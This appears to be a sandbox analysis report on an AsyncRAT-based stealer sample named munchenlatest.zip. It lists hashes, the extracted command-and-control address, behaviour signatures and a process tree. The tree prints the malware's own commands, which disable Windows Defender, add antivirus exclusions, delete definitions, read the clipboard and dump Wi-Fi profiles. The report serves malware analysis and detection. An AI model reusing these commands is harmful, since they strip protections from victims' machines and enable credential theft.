Analysis
-
max time kernel
52s -
max time network
81s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
28-10-2024 18:07
Static task
static1
Behavioral task
behavioral1
Sample
munchenlatest.zip
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
munchenlatest.zip
Resource
win11-20241007-en
General
-
Target
munchenlatest.zip
-
Size
8.8MB
-
MD5
8a426208fc37e756dffd738ecb77b305
-
SHA1
d06b79e9fb69d443da7d1ffe8dbf2c6992e64c4b
-
SHA256
7b97c5e022c4225bfc79606d9dcc30c0d8b9bac4a8fcbd60a2236cf1db0305d9
-
SHA512
6caa2f63c0341fa91f9bc142071b022f46b5b4d084b57419066b02b8fd535478fbb16528dfc4354ef510e027cbe6aa7f3b10738a0c0482db3df1cab404b97d9b
-
SSDEEP
196608:EQuDY9mHqfFqhwz7koW/qrerJaJyHCrg4Kd0HDFQz2nkVONDsNIy:EZDYwHLyPkV2eV6yyOAeQkVImF
Malware Config
Extracted
asyncrat
1.0.7
Guppies
198.98.58.93:999
SYSTEMSPOOF
-
delay
1
-
install
true
-
install_file
Core Sound Service.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Core Sound Service.exe family_asyncrat -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3808 powershell.exe 6032 powershell.exe 5048 powershell.exe 5112 powershell.exe -
Drops file in Drivers directory 3 IoCs
Processes:
attrib.exerundii.exeattrib.exedescription ioc process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts rundii.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 12 IoCs
Processes:
munchenlatest.exerundii32.exerundii.exesplwow64.exeCore Sound Service.exerundii.exemunchenlatest.exerundii32.exerundii.exesplwow64.exeCore Sound Service.exerundii.exepid process 1576 munchenlatest.exe 2312 rundii32.exe 3676 rundii.exe 4028 splwow64.exe 4088 Core Sound Service.exe 3424 rundii.exe 2400 munchenlatest.exe 4384 rundii32.exe 1336 rundii.exe 3024 splwow64.exe 112 Core Sound Service.exe 4624 rundii.exe -
Loads dropped DLL 33 IoCs
Processes:
rundii.exerundii.exepid process 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 3424 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe 4624 rundii.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 2 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 4356 tasklist.exe 2412 tasklist.exe 5848 tasklist.exe 5576 tasklist.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI36762\python310.dll upx behavioral2/memory/3424-117-0x00007FF9D4C30000-0x00007FF9D5096000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI36762\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI36762\libcrypto-1_1.dll upx behavioral2/memory/3424-200-0x00007FF9E7E90000-0x00007FF9E7EA8000-memory.dmp upx behavioral2/memory/3424-202-0x00007FF9D3E30000-0x00007FF9D3FAA000-memory.dmp upx behavioral2/memory/3424-201-0x00007FF9DE4A0000-0x00007FF9DE4BF000-memory.dmp upx behavioral2/memory/3424-199-0x00007FF9E8010000-0x00007FF9E803C000-memory.dmp upx behavioral2/memory/3424-207-0x00007FF9D39F0000-0x00007FF9D3AA8000-memory.dmp upx behavioral2/memory/3424-208-0x00007FF9D3AB0000-0x00007FF9D3E29000-memory.dmp upx behavioral2/memory/3424-209-0x00007FF9E7E30000-0x00007FF9E7E54000-memory.dmp upx behavioral2/memory/3424-210-0x00007FF9DD530000-0x00007FF9DD545000-memory.dmp upx behavioral2/memory/3424-212-0x00007FF9D38D0000-0x00007FF9D39E8000-memory.dmp upx behavioral2/memory/3424-211-0x00007FF9EC6E0000-0x00007FF9EC6ED000-memory.dmp upx behavioral2/memory/3424-206-0x00007FF9D4C30000-0x00007FF9D5096000-memory.dmp upx behavioral2/memory/3424-205-0x00007FF9DE450000-0x00007FF9DE47E000-memory.dmp upx behavioral2/memory/3424-204-0x00007FF9ECE60000-0x00007FF9ECE6D000-memory.dmp upx behavioral2/memory/3424-203-0x00007FF9DE480000-0x00007FF9DE499000-memory.dmp upx behavioral2/memory/3424-133-0x00007FF9ECF40000-0x00007FF9ECF4F000-memory.dmp upx behavioral2/memory/3424-132-0x00007FF9E7E30000-0x00007FF9E7E54000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI36762\libffi-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI36762\_ctypes.pyd upx behavioral2/memory/3424-286-0x00007FF9DE4A0000-0x00007FF9DE4BF000-memory.dmp upx behavioral2/memory/3424-287-0x00007FF9D3E30000-0x00007FF9D3FAA000-memory.dmp upx behavioral2/memory/4624-288-0x00007FF9D25A0000-0x00007FF9D2A06000-memory.dmp upx behavioral2/memory/3424-292-0x00007FF9DE450000-0x00007FF9DE47E000-memory.dmp upx behavioral2/memory/3424-291-0x00007FF9DE480000-0x00007FF9DE499000-memory.dmp upx behavioral2/memory/4624-290-0x00007FF9EC230000-0x00007FF9EC23F000-memory.dmp upx behavioral2/memory/4624-289-0x00007FF9DD190000-0x00007FF9DD1B4000-memory.dmp upx behavioral2/memory/4624-323-0x00007FF9E8900000-0x00007FF9E890D000-memory.dmp upx behavioral2/memory/4624-325-0x00007FF9D07E0000-0x00007FF9D07F9000-memory.dmp upx behavioral2/memory/4624-324-0x00007FF9D07B0000-0x00007FF9D07DE000-memory.dmp upx behavioral2/memory/3424-313-0x00007FF9D3AB0000-0x00007FF9D3E29000-memory.dmp upx behavioral2/memory/4624-312-0x00007FF9D21E0000-0x00007FF9D235A000-memory.dmp upx behavioral2/memory/4624-311-0x00007FF9E89E0000-0x00007FF9E89FF000-memory.dmp upx behavioral2/memory/4624-310-0x00007FF9E8A00000-0x00007FF9E8A18000-memory.dmp upx behavioral2/memory/4624-309-0x00007FF9E8A20000-0x00007FF9E8A4C000-memory.dmp upx behavioral2/memory/3424-308-0x00007FF9D39F0000-0x00007FF9D3AA8000-memory.dmp upx behavioral2/memory/4624-358-0x00007FF9D0090000-0x00007FF9D0409000-memory.dmp upx behavioral2/memory/4624-359-0x00007FF9D06F0000-0x00007FF9D07A8000-memory.dmp upx behavioral2/memory/4624-382-0x00007FF9D06D0000-0x00007FF9D06E5000-memory.dmp upx behavioral2/memory/4624-383-0x00007FF9E85F0000-0x00007FF9E85FD000-memory.dmp upx behavioral2/memory/4624-396-0x00007FF9D06F0000-0x00007FF9D07A8000-memory.dmp upx behavioral2/memory/4624-399-0x00007FF9D07E0000-0x00007FF9D07F9000-memory.dmp upx behavioral2/memory/4624-395-0x00007FF9D0090000-0x00007FF9D0409000-memory.dmp upx behavioral2/memory/4624-394-0x00007FF9D07B0000-0x00007FF9D07DE000-memory.dmp upx behavioral2/memory/4624-393-0x00007FF9E8900000-0x00007FF9E890D000-memory.dmp upx behavioral2/memory/4624-391-0x00007FF9D21E0000-0x00007FF9D235A000-memory.dmp upx behavioral2/memory/4624-390-0x00007FF9E89E0000-0x00007FF9E89FF000-memory.dmp upx behavioral2/memory/4624-389-0x00007FF9E8A00000-0x00007FF9E8A18000-memory.dmp upx behavioral2/memory/4624-388-0x00007FF9E8A20000-0x00007FF9E8A4C000-memory.dmp upx behavioral2/memory/4624-387-0x00007FF9EC230000-0x00007FF9EC23F000-memory.dmp upx behavioral2/memory/4624-386-0x00007FF9DD190000-0x00007FF9DD1B4000-memory.dmp upx behavioral2/memory/4624-385-0x00007FF9D25A0000-0x00007FF9D2A06000-memory.dmp upx behavioral2/memory/3424-418-0x00007FF9D4C30000-0x00007FF9D5096000-memory.dmp upx behavioral2/memory/3424-420-0x00007FF9E7E30000-0x00007FF9E7E54000-memory.dmp upx behavioral2/memory/3424-565-0x00007FF9DE4A0000-0x00007FF9DE4BF000-memory.dmp upx behavioral2/memory/3424-566-0x00007FF9D3E30000-0x00007FF9D3FAA000-memory.dmp upx behavioral2/memory/3424-560-0x00007FF9D4C30000-0x00007FF9D5096000-memory.dmp upx behavioral2/memory/3424-561-0x00007FF9E7E30000-0x00007FF9E7E54000-memory.dmp upx behavioral2/memory/3424-610-0x00007FF9D4C30000-0x00007FF9D5096000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 10 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exemunchenlatest.exepowershell.exepowershell.exepowershell.exemunchenlatest.exerundii32.exepowershell.exepowershell.exerundii32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenlatest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language munchenlatest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundii32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundii32.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 5988 schtasks.exe 1516 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 35 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.exepid process 4504 powershell.exe 644 powershell.exe 948 powershell.exe 4504 powershell.exe 644 powershell.exe 644 powershell.exe 948 powershell.exe 948 powershell.exe 1692 powershell.exe 1692 powershell.exe 4652 powershell.exe 4652 powershell.exe 5112 powershell.exe 5112 powershell.exe 3808 powershell.exe 3808 powershell.exe 1432 powershell.exe 1432 powershell.exe 5112 powershell.exe 5112 powershell.exe 3808 powershell.exe 3808 powershell.exe 1692 powershell.exe 1692 powershell.exe 4652 powershell.exe 4652 powershell.exe 1432 powershell.exe 5836 powershell.exe 5836 powershell.exe 5872 powershell.exe 5872 powershell.exe 5836 powershell.exe 5872 powershell.exe 5676 conhost.exe 5676 conhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
7zFM.exepid process 2232 7zFM.exe -
Suspicious use of AdjustPrivilegeToken 60 IoCs
Processes:
7zFM.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exepowershell.exetasklist.exeWMIC.exepowershell.exepowershell.execonhost.exetasklist.exedescription pid process Token: SeRestorePrivilege 2232 7zFM.exe Token: 35 2232 7zFM.exe Token: SeSecurityPrivilege 2232 7zFM.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeDebugPrivilege 4504 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 4652 powershell.exe Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 4356 tasklist.exe Token: SeDebugPrivilege 2412 tasklist.exe Token: SeDebugPrivilege 1432 powershell.exe Token: SeDebugPrivilege 5848 tasklist.exe Token: SeIncreaseQuotaPrivilege 5860 WMIC.exe Token: SeSecurityPrivilege 5860 WMIC.exe Token: SeTakeOwnershipPrivilege 5860 WMIC.exe Token: SeLoadDriverPrivilege 5860 WMIC.exe Token: SeSystemProfilePrivilege 5860 WMIC.exe Token: SeSystemtimePrivilege 5860 WMIC.exe Token: SeProfSingleProcessPrivilege 5860 WMIC.exe Token: SeIncBasePriorityPrivilege 5860 WMIC.exe Token: SeCreatePagefilePrivilege 5860 WMIC.exe Token: SeBackupPrivilege 5860 WMIC.exe Token: SeRestorePrivilege 5860 WMIC.exe Token: SeShutdownPrivilege 5860 WMIC.exe Token: SeDebugPrivilege 5860 WMIC.exe Token: SeSystemEnvironmentPrivilege 5860 WMIC.exe Token: SeRemoteShutdownPrivilege 5860 WMIC.exe Token: SeUndockPrivilege 5860 WMIC.exe Token: SeManageVolumePrivilege 5860 WMIC.exe Token: 33 5860 WMIC.exe Token: 34 5860 WMIC.exe Token: 35 5860 WMIC.exe Token: 36 5860 WMIC.exe Token: SeDebugPrivilege 5836 powershell.exe Token: SeDebugPrivilege 5872 powershell.exe Token: SeIncreaseQuotaPrivilege 5860 WMIC.exe Token: SeSecurityPrivilege 5860 WMIC.exe Token: SeTakeOwnershipPrivilege 5860 WMIC.exe Token: SeLoadDriverPrivilege 5860 WMIC.exe Token: SeSystemProfilePrivilege 5860 WMIC.exe Token: SeSystemtimePrivilege 5860 WMIC.exe Token: SeProfSingleProcessPrivilege 5860 WMIC.exe Token: SeIncBasePriorityPrivilege 5860 WMIC.exe Token: SeCreatePagefilePrivilege 5860 WMIC.exe Token: SeBackupPrivilege 5860 WMIC.exe Token: SeRestorePrivilege 5860 WMIC.exe Token: SeShutdownPrivilege 5860 WMIC.exe Token: SeDebugPrivilege 5860 WMIC.exe Token: SeSystemEnvironmentPrivilege 5860 WMIC.exe Token: SeRemoteShutdownPrivilege 5860 WMIC.exe Token: SeUndockPrivilege 5860 WMIC.exe Token: SeManageVolumePrivilege 5860 WMIC.exe Token: 33 5860 WMIC.exe Token: 34 5860 WMIC.exe Token: 35 5860 WMIC.exe Token: 36 5860 WMIC.exe Token: SeDebugPrivilege 5676 conhost.exe Token: SeDebugPrivilege 5576 tasklist.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
7zFM.exepid process 2232 7zFM.exe 2232 7zFM.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
munchenlatest.exerundii32.exerundii.exerundii.exemunchenlatest.exerundii32.exerundii.exerundii.exepid process 1576 munchenlatest.exe 2312 rundii32.exe 3676 rundii.exe 3424 rundii.exe 2400 munchenlatest.exe 4384 rundii32.exe 1336 rundii.exe 4624 rundii.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
munchenlatest.exerundii32.exerundii.exerundii.exemunchenlatest.exerundii32.execmd.exerundii.execmd.execmd.execmd.exedescription pid process target process PID 1576 wrote to memory of 644 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 644 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 644 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 4504 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 4504 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 4504 1576 munchenlatest.exe powershell.exe PID 1576 wrote to memory of 2312 1576 munchenlatest.exe rundii32.exe PID 1576 wrote to memory of 2312 1576 munchenlatest.exe rundii32.exe PID 1576 wrote to memory of 2312 1576 munchenlatest.exe rundii32.exe PID 2312 wrote to memory of 948 2312 rundii32.exe powershell.exe PID 2312 wrote to memory of 948 2312 rundii32.exe powershell.exe PID 2312 wrote to memory of 948 2312 rundii32.exe powershell.exe PID 2312 wrote to memory of 3676 2312 rundii32.exe rundii.exe PID 2312 wrote to memory of 3676 2312 rundii32.exe rundii.exe PID 2312 wrote to memory of 4028 2312 rundii32.exe splwow64.exe PID 2312 wrote to memory of 4028 2312 rundii32.exe splwow64.exe PID 2312 wrote to memory of 4088 2312 rundii32.exe Core Sound Service.exe PID 2312 wrote to memory of 4088 2312 rundii32.exe Core Sound Service.exe PID 3676 wrote to memory of 3424 3676 rundii.exe rundii.exe PID 3676 wrote to memory of 3424 3676 rundii.exe rundii.exe PID 3424 wrote to memory of 1152 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 1152 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4820 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4820 3424 rundii.exe cmd.exe PID 2400 wrote to memory of 1692 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 1692 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 1692 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4652 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4652 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4652 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4384 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4384 2400 munchenlatest.exe powershell.exe PID 2400 wrote to memory of 4384 2400 munchenlatest.exe powershell.exe PID 4384 wrote to memory of 1432 4384 rundii32.exe powershell.exe PID 4384 wrote to memory of 1432 4384 rundii32.exe powershell.exe PID 4384 wrote to memory of 1432 4384 rundii32.exe powershell.exe PID 3424 wrote to memory of 3332 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 3332 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 3120 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 3120 3424 rundii.exe cmd.exe PID 4384 wrote to memory of 1336 4384 rundii32.exe attrib.exe PID 4384 wrote to memory of 1336 4384 rundii32.exe attrib.exe PID 4384 wrote to memory of 3024 4384 rundii32.exe splwow64.exe PID 4384 wrote to memory of 3024 4384 rundii32.exe splwow64.exe PID 4384 wrote to memory of 112 4384 rundii32.exe Core Sound Service.exe PID 4384 wrote to memory of 112 4384 rundii32.exe Core Sound Service.exe PID 1152 wrote to memory of 5112 1152 cmd.exe powershell.exe PID 1152 wrote to memory of 5112 1152 cmd.exe powershell.exe PID 1336 wrote to memory of 4624 1336 rundii.exe rundii.exe PID 1336 wrote to memory of 4624 1336 rundii.exe rundii.exe PID 4820 wrote to memory of 3808 4820 cmd.exe powershell.exe PID 4820 wrote to memory of 3808 4820 cmd.exe powershell.exe PID 3120 wrote to memory of 4356 3120 cmd.exe tasklist.exe PID 3120 wrote to memory of 4356 3120 cmd.exe tasklist.exe PID 3332 wrote to memory of 2412 3332 cmd.exe tasklist.exe PID 3332 wrote to memory of 2412 3332 cmd.exe tasklist.exe PID 3424 wrote to memory of 4952 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4952 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4500 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4500 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4904 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 4904 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 3288 3424 rundii.exe cmd.exe PID 3424 wrote to memory of 3288 3424 rundii.exe cmd.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 6024 attrib.exe 1336 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\munchenlatest.zip"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2232
-
C:\Users\Admin\Desktop\munchenlatest.exe"C:\Users\Admin\Desktop\munchenlatest.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1576 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbABxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAdwB1ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABwAHIAbwBnAHIAYQBtACAAYwBhAG4AJwAnAHQAIABzAHQAYQByAHQAIABiAGUAYwBhAHUAcwBlACAATQBTAFYAQwBQADEANAAwAC4AZABsAGwAIABpAHMAIABtAGkAcwBzAGkAbgBnACAAZgByAG8AbQAgAHkAbwB1AHIAIABjAG8AbQBwAHUAdABlAHIALgAgAFQAcgB5ACAAcgBlAGkAbgBzAHQAYQBsAGwAaQBuAGcAIAB0AGgAZQAgAHAAcgBvAGcAcgBhAG0AIAB0AG8AIABmAGkAeAAgAHQAaABpAHMAIABwAHIAbwBiAGwAZQBtAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBlACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYgB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAdQBwACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABzACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504 -
C:\Users\Admin\AppData\Local\Temp\rundii32.exe"C:\Users\Admin\AppData\Local\Temp\rundii32.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAbQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcwB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAdgBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAcABjACMAPgA="3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\rundii.exe"C:\Users\Admin\AppData\Local\Temp\rundii.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3424 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'"5⤵
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\rundii.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5112 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
PID:4820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3808 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:3332 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵PID:4952
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5860 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
- Clipboard Data
PID:4500 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:4904
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5848 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵PID:3288
-
C:\Windows\system32\tree.comtree /A /F6⤵PID:5712
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:224 -
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5828 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵PID:4776
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
PID:5812 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"5⤵PID:2040
-
